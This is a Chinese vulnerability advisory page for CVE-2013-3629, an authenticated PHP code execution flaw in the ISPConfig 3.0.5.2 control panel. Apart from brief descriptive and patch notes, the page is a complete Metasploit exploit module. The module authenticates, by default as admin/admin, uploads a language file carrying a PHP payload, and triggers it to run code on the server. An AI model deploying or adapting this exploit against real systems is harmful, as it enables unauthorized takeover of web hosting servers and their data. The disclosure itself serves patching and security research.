内容安全 
大数据安全 
网络安全 
更多产品 
ISPConfig \'/content.php\'任意PHP代码执行漏洞
信息来源:Brandon Perry 发表日期:2013-02-15 16:30:00
ISPConfig是开源的、BSD许可的、Linux主机控制面板,用于管理Apache、BIND、FTP及数据库,支持许多Linux发行版。
ISPConfig 3.0.5.2版本的/content.php 脚本解析语言文件时会触发任意PHP代码执行漏洞,导致覆盖系统上之前的语言文件,在Web服务器上下文中执行任意PHP代码。
BUGTRAQ-ID:63455
CVE-ID:2013-3629
受影响系统:
ispconfig ispconfig 3.0.5.2
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require \'msf/core\'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
\'Name\' => \'ISPConfig Authenticated Arbitrary PHP Code Execution\',
\'Description\' => %q{
ISPConfig allows an authenticated administrator to export language settings into a PHP script
which is intended to be reuploaded later to restore language settings. This feature
can be abused to run aribtrary PHP code remotely on the ISPConfig server.
This module was tested against version 3.0.5.2.
},
\'Author\' =>
[
\'Brandon Perry <bperry.volatile[at]gmail.com>\' # Discovery / msf module
],
\'License\' => MSF_LICENSE,
\'References\' =>
[
[\'CVE\', \'2013-3629\'],
[\'URL\', \'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats\']
],
\'Privileged\' => false,
\'Platform\' => [\'php\'],
\'Arch\' => ARCH_PHP,
\'Payload\' =>
{
\'BadChars\' => "&\\n=+%",
},
\'Targets\' =>
[
[ \'Automatic\', { } ],
],
\'DefaultTarget\' => 0,
\'DisclosureDate\' => \'Oct 30 2013\'))
register_options(
[
OptString.new(\'TARGETURI\', [ true, "Base ISPConfig directory path", \'/\']),
OptString.new(\'USERNAME\', [ true, "Username to authenticate with", \'admin\']),
OptString.new(\'PASSWORD\', [ false, "Password to authenticate with", \'admin\']),
OptString.new(\'LANGUAGE\', [ true, "The language to use to trigger the payload", \'es\'])
], self.class)
end
def check
end
def lng
datastore[\'LANGUAGE\']
end
def exploit
init = send_request_cgi({
\'method\' => \'GET\',
\'uri\' => normalize_uri(target_uri.path, \'/index.php\')
})
if !init or init.code != 200
fail_with("Error getting initial page.")
end
sess = init.get_cookies
post = {
\'username\' => datastore["USERNAME"],
\'passwort\' => datastore["PASSWORD"],
\'s_mod\' => \'login\',
\'s_pg\' => \'index\'
}
print_status("Authenticating as user: " << datastore["USERNAME"])
login = send_request_cgi({
\'method\' => \'POST\',
\'uri\' => normalize_uri(target_uri.path, \'/content.php\'),
\'vars_post\' => post,
\'cookie\' => sess
})
if !login or login.code != 200
fail_with("Error authenticating.")
end
sess = login.get_cookies
fname = rand_text_alphanumeric(rand(10)+6) + \'.lng\'
php = "---|ISPConfig Language File|3.0.5.2|#{lng}\\n"
php << "--|global|#{lng}|#{lng}.lng\\n"
php << "<?php \\n"
php << payload.encoded
php << "?>\\n"
php << "--|mail|#{lng}|#{lng}.lng\\n"
php << "<?php"
php << "?>"
data = Rex::MIME::Message.new
data.add_part(php, \'application/x-php\', nil, "form-data; name=\\"file\\"; filename=\\"#{fname }\\"")
data.add_part(\'1\', nil, nil, \'form-data; name="overwrite"\')
data.add_part(\'1\', nil, nil, \'form-data; name="ignore_version"\')
data.add_part(\'\', nil, nil, \'form-data; name="id"\')
data_post = data.to_s
print_status("Sending payload")
send_request_cgi({
\'method\' => \'POST\',
\'uri\' => normalize_uri(target_uri.path, \'/admin/language_import.php\'),
\'ctype\' => "multipart/form-data; boundary=#{data.bound}",
\'data\' => data_post,
\'cookie\' => sess
})
post = {
\'lng_select\' => \'es\'
}
print_status("Triggering payload...")
send_request_cgi({
\'method\' => \'POST\',
\'uri\' => normalize_uri(target_uri.path, \'/admin/language_complete.php\'),
\'vars_post\' => post,
\'cookie\' => sess
})
end
end
解决办法:
厂商补丁:
ispconfig
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.ispconfig.org/page/home.html
参考信息:
http://osvdb.org/show/osvdb/99146
